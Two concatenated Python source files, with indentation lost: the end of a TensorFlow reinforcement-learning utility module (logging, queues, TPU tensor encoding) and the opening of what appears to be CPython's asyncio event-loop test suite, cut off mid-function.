self.step_cnt = tf.Variable(-1, dtype=tf.int64)
self.ready_values = tf.Variable([-1.0],
dtype=tf.float32,
shape=tf.TensorShape(None))
self.logger_thread = None
self.logging_callback = None
self.terminator = None
self.last_log_time = timeit.default_timer()
self.last_log_step = 0
def start(self, logging_callback=None):
assert self.logger_thread is None
self.logging_callback = logging_callback
self.terminator = threading.Event()
self.logger_thread = threading.Thread(target=self._logging_loop)
self.logger_thread.start()
def shutdown(self):
assert self.logger_thread
self.terminator.set()
self.logger_thread.join()
self.logger_thread = None
def log_session(self):
return []
def log(self, session, name, value):
# this is a python op so it happens only when this tf.function is compiled
if name not in self.log_keys_set:
self.log_keys.append(name)
self.log_keys_set.add(name)
# this is a TF op.
session.append(value)
def log_session_from_dict(self, dic):
session = self.log_session()
for key in dic:
self.log(session, key, dic[key])
return session
def step_end(self, session, strategy=None, step_increment=1):
logs = []
for value in session:
if strategy:
value = tf.reduce_mean(tf.cast(
strategy.experimental_local_results(value)[0], tf.float32))
logs.append(value)
self.ready_values.assign(logs)
self.step_cnt.assign_add(step_increment)
def _log(self):
"""Perform single round of logging."""
logging_time = timeit.default_timer()
step_cnt = self.step_cnt.read_value()
values = self.ready_values.read_value().numpy()
if values[0] == -1:
return
assert len(values) == len(
self.log_keys
), 'Mismatch between number of keys and values to log: %r vs %r' % (
values, self.log_keys)
if self.summary_writer:
self.summary_writer.set_as_default()
tf.summary.experimental.set_step(step_cnt.numpy())
if self.logging_callback:
self.logging_callback()
for key, value in zip(self.log_keys, values):
tf.summary.scalar(key, value)
dt = logging_time - self.last_log_time
df = tf.cast(step_cnt - self.last_log_step, tf.float32)
tf.summary.scalar('speed/steps_per_sec', df / dt)
self.last_log_time, self.last_log_step = logging_time, step_cnt
def _logging_loop(self):
last_log_try = timeit.default_timer()
while not self.terminator.is_set():
self._log()
now = timeit.default_timer()
elapsed = now - last_log_try
last_log_try = now
self.period = min(self.period_factor * self.period,
self.max_period)
self.terminator.wait(timeout=max(0, self.period - elapsed))
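# Illustrative usage sketch (not part of the original module); shows the
# intended call pattern from a training loop. Without a summary_writer the
# values are collected by the background thread but not exported anywhere.
def _example_progress_logger():
  logger = ProgressLogger()
  logger.start()
  for _ in range(3):
    session = logger.log_session()
    logger.log(session, 'loss', tf.constant(0.5))
    logger.step_end(session)
  logger.shutdown()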
class StructuredFIFOQueue(tf.queue.FIFOQueue):
"""A tf.queue.FIFOQueue that supports nests and tf.TensorSpec."""
def __init__(self,
capacity,
specs,
shared_name=None,
name='structured_fifo_queue'):
self._specs = specs
self._flattened_specs = tf.nest.flatten(specs)
dtypes = [ts.dtype for ts in self._flattened_specs]
shapes = [ts.shape for ts in self._flattened_specs]
super(StructuredFIFOQueue, self).__init__(capacity, dtypes, shapes)
def dequeue(self, name=None):
result = super(StructuredFIFOQueue, self).dequeue(name=name)
return tf.nest.pack_sequence_as(self._specs, result)
def dequeue_many(self, batch_size, name=None):
result = super(StructuredFIFOQueue, self).dequeue_many(
batch_size, name=name)
return tf.nest.pack_sequence_as(self._specs, result)
def enqueue(self, vals, name=None):
tf.nest.assert_same_structure(vals, self._specs)
return super(StructuredFIFOQueue, self).enqueue(
tf.nest.flatten(vals), name=name)
def enqueue_many(self, vals, name=None):
tf.nest.assert_same_structure(vals, self._specs)
return super(StructuredFIFOQueue, self).enqueue_many(
tf.nest.flatten(vals), name=name)
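# Illustrative usage sketch (not part of the original module); assumes eager
# TF2. The queue returns values with the same nest structure as `specs`.
def _example_structured_fifo_queue():
  specs = {'obs': tf.TensorSpec([2], tf.float32),
           'done': tf.TensorSpec([], tf.bool)}
  q = StructuredFIFOQueue(capacity=4, specs=specs)
  q.enqueue({'obs': tf.zeros([2]), 'done': tf.constant(False)})
  return q.dequeue()  # a dict with the same keys as `specs`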
def batch_apply(fn, inputs):
"""Folds time into the batch dimension, runs fn() and unfolds the result.
Args:
fn: Function that takes as input the n tensors of the tf.nest structure,
with shape [time*batch, <remaining shape>], and returns a tf.nest
structure of batched tensors.
inputs: tf.nest structure of n [time, batch, <remaining shape>] tensors.
Returns:
tf.nest structure of [time, batch, <fn output shape>]. Structure is
determined by the output of fn.
"""
time_to_batch_fn = lambda t: tf.reshape(t, [-1] + t.shape[2:].as_list())
batched = tf.nest.map_structure(time_to_batch_fn, inputs)
output = fn(*batched)
prefix = [int(tf.nest.flatten(inputs)[0].shape[0]), -1]
batch_to_time_fn = lambda t: tf.reshape(t, prefix + t.shape[1:].as_list())
return tf.nest.map_structure(batch_to_time_fn, output)
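# Illustrative usage sketch (not part of the original module); assumes eager
# TF2. A Dense layer expects [batch, features], so time is folded into the
# batch dimension, the layer is applied, and the result is unfolded again.
def _example_batch_apply():
  layer = tf.keras.layers.Dense(8)
  x = tf.random.normal([10, 4, 16])  # [time, batch, features]
  return batch_apply(layer, (x,))    # shape [10, 4, 8]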
def make_time_major(x):
"""Transposes the batch and time dimensions of a nest of Tensors.
If an input tensor has rank < 2 it returns the original tensor. Retains as
much of the static shape information as possible.
Args:
x: A nest of Tensors.
Returns:
x transposed along the first two dimensions.
"""
def transpose(t):
t_static_shape = t.shape
if t_static_shape.rank is not None and t_static_shape.rank < 2:
return t
t_rank = tf.rank(t)
t_t = tf.transpose(t, tf.concat(([1, 0], tf.range(2, t_rank)), axis=0))
t_t.set_shape(
tf.TensorShape([t_static_shape[1],
t_static_shape[0]]).concatenate(t_static_shape[2:]))
return t_t
return tf.nest.map_structure(
lambda t: tf.xla.experimental.compile(transpose, [t])[0], x)
class TPUEncodedUInt8Spec(tf.TypeSpec):
"""Type specification for composite tensor TPUEncodedUInt8."""
def __init__(self, encoded_shape, original_shape):
self._value_specs = (tf.TensorSpec(encoded_shape, tf.uint32),)
self.original_shape = original_shape
@property
def _component_specs(self):
return self._value_specs
def _to_components(self, value):
return (value.encoded,)
def _from_components(self, components):
return TPUEncodedUInt8(components[0], self.original_shape)
def _serialize(self):
return self._value_specs[0].shape, self.original_shape
def _to_legacy_output_types(self):
return self._value_specs[0].dtype
def _to_legacy_output_shapes(self):
return self._value_specs[0].shape
@property
def value_type(self):
return TPUEncodedUInt8
class TPUEncodedUInt8(composite_tensor.CompositeTensor):
def __init__(self, encoded, shape):
self.encoded = encoded
self.original_shape = shape
self._spec = TPUEncodedUInt8Spec(encoded.shape, tf.TensorShape(shape))
@property
def _type_spec(self):
return self._spec
tensor_conversion_registry.register_tensor_conversion_function(
TPUEncodedUInt8, lambda value, *unused_args, **unused_kwargs: value.encoded)
class TPUEncodedF32Spec(tf.TypeSpec):
"""Type specification for composite tensor TPUEncodedF32Spec."""
def __init__(self, encoded_shape, original_shape):
self._value_specs = (tf.TensorSpec(encoded_shape, tf.float32),)
self.original_shape = original_shape
@property
def _component_specs(self):
return self._value_specs
def _to_components(self, value):
return (value.encoded,)
def _from_components(self, components):
return TPUEncodedF32(components[0], self.original_shape)
def _serialize(self):
return self._value_specs[0].shape, self.original_shape
def _to_legacy_output_types(self):
return self._value_specs[0].dtype
def _to_legacy_output_shapes(self):
return self._value_specs[0].shape
@property
def value_type(self):
return TPUEncodedF32
class TPUEncodedF32(composite_tensor.CompositeTensor):
def __init__(self, encoded, shape):
self.encoded = encoded
self.original_shape = shape
self._spec = TPUEncodedF32Spec(encoded.shape, tf.TensorShape(shape))
@property
def _type_spec(self):
return self._spec
tensor_conversion_registry.register_tensor_conversion_function(
TPUEncodedF32, lambda value, *unused_args, **unused_kwargs: value.encoded)
def num_divisible(v, m):
return sum([1 for x in v if x % m == 0])
def tpu_encode(ts):
"""Encodes a nest of Tensors in a suitable way for TPUs.
TPUs do not support tf.uint8, tf.uint16 and other data types. Furthermore,
the speed of transfer and device reshapes depend on the shape of the data.
This function tries to optimize the data encoding for a number of use cases.
Should be used on CPU before sending data to TPU and in conjunction with
`tpu_decode` after the data is transferred.
Args:
ts: A tf.nest of Tensors.
Returns:
A tf.nest of encoded Tensors.
"""
def visit(t):
num_elements = t.shape.num_elements()
# We need a multiple of 128 elements: encoding reduces the number of
# elements by a factor 4 (packing uint8s into uint32s), and first thing
# decode does is to reshape with a 32 minor-most dimension.
if (t.dtype == tf.uint8 and num_elements is not None and
num_elements % 128 == 0):
# For details of these transformations, see b/137182262.
x = tf.xla.experimental.compile(
lambda x: tf.transpose(x, list(range(1, t.shape.rank)) + [0]), [t])[0]
x = tf.reshape(x, [-1, 4])
x = tf.bitcast(x, tf.uint32)
x = tf.reshape(x, [-1])
return TPUEncodedUInt8(x, t.shape)
elif t.dtype == tf.uint8:
logging.warning('Inefficient uint8 transfer with shape: %s', t.shape)
return tf.cast(t, tf.bfloat16)
elif t.dtype == tf.uint16:
return tf.cast(t, tf.int32)
elif (t.dtype == tf.float32 and t.shape.rank > 1 and not
(num_divisible(t.shape.dims, 128) >= 1 and
num_divisible(t.shape.dims, 8) >= 2)):
x = tf.reshape(t, [-1])
return TPUEncodedF32(x, t.shape)
else:
return t
return tf.nest.map_structure(visit, ts)
def tpu_decode(ts, structure=None):
"""Decodes a nest of Tensors encoded with tpu_encode.
Args:
ts: A nest of Tensors or TPUEncodedUInt8 composite tensors.
structure: If not None, a nest of Tensors or TPUEncodedUInt8 composite
tensors (possibly within PerReplica's) that are only used to recreate the
structure of `ts` which then should be a list without composite tensors.
Returns:
A nest of decoded tensors packed as `structure` if available, otherwise
packed as `ts`.
"""
def visit(t, s):
s = s.values[0] if isinstance(s, values_lib.PerReplica) else s
if isinstance(s, TPUEncodedUInt8):
x = t.encoded if isinstance(t, TPUEncodedUInt8) else t
x = tf.reshape(x, [-1, 32, 1])
x = tf.broadcast_to(x, x.shape[:-1] + [4])
x = tf.reshape(x, [-1, 128])
x = tf.bitwise.bitwise_and(x, [0xFF, 0xFF00, 0xFF0000, 0xFF000000] * 32)
x = tf.bitwise.right_shift(x, [0, 8, 16, 24] * 32)
rank = s.original_shape.rank
perm = [rank - 1] + list(range(rank - 1))
inverted_shape = np.array(s.original_shape)[np.argsort(perm)]
x = tf.reshape(x, inverted_shape)
x = tf.transpose(x, perm)
return x
elif isinstance(s, TPUEncodedF32):
x = t.encoded if isinstance(t, TPUEncodedF32) else t
x = tf.reshape(x, s.original_shape)
return x
else:
return t
return tf.nest.map_structure(visit, ts, structure or ts)
def split_structure(structure, prefix_length, axis=0):
"""Splits in two a tf.nest structure of tensors along the first axis."""
flattened = tf.nest.flatten(structure)
split = [tf.split(x, [prefix_length, tf.shape(x)[axis] - prefix_length],
axis=axis)
for x in flattened]
flattened_prefix = [pair[0] for pair in split]
flattened_suffix = [pair[1] for pair in split]
return (tf.nest.pack_sequence_as(structure, flattened_prefix),
tf.nest.pack_sequence_as(structure, flattened_suffix))
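# Illustrative usage sketch (not part of the original module); assumes eager
# TF2. Every tensor in the nest is split along the same axis.
def _example_split_structure():
  nest = {'a': tf.range(5), 'b': tf.zeros([5, 3])}
  head, tail = split_structure(nest, prefix_length=2)
  return head, tail  # head['a'] has 2 elements, tail['a'] has the remaining 3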
class nullcontext(object):
def __init__(self, *args, **kwds):
del args # unused
del kwds # unused
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
def tensor_spec_from_gym_space(space, name):
"""Get a TensorSpec from a gym spec."""
if space.shape is not None:
return tf.TensorSpec(space.shape, space.dtype, name)
if not isinstance(space, gym.spaces.Tuple):
raise ValueError(
'Space \'{}\' is not a tuple: unknown shape.'.format(space))
num_elements = 0
for s in space:
if len(s.shape) != 1:
raise ValueError(
'Only 1 dimension subspaces are handled for tuple spaces: {}'.format(
space))
num_elements += s.shape[0]
return tf.TensorSpec((num_elements,), tf.float32, name)
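# Illustrative usage sketch (not part of the original module); assumes the
# `gym` dependency imported above. Box spaces map directly to a TensorSpec,
# while tuples of 1-D spaces are concatenated into a single float32 spec.
def _example_tensor_spec_from_gym_space():
  box = gym.spaces.Box(low=-1.0, high=1.0, shape=(3,))
  tup = gym.spaces.Tuple((gym.spaces.Box(-1.0, 1.0, (2,)),
                          gym.spaces.Box(-1.0, 1.0, (3,))))
  return (tensor_spec_from_gym_space(box, 'observation'),   # shape (3,)
          tensor_spec_from_gym_space(tup, 'observation'))   # shape (5,)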
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = loop.create_future()
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = loop.create_future()
self.completed = loop.create_future()
self.disconnects = {fd: loop.create_future() for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case we still have transport close callbacks pending
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
with self.assertWarnsRegex(
RuntimeWarning,
r"coroutine \S+ was never awaited"
):
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
An ssl.create_default_context() replacement that doesn't enable
certificate validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
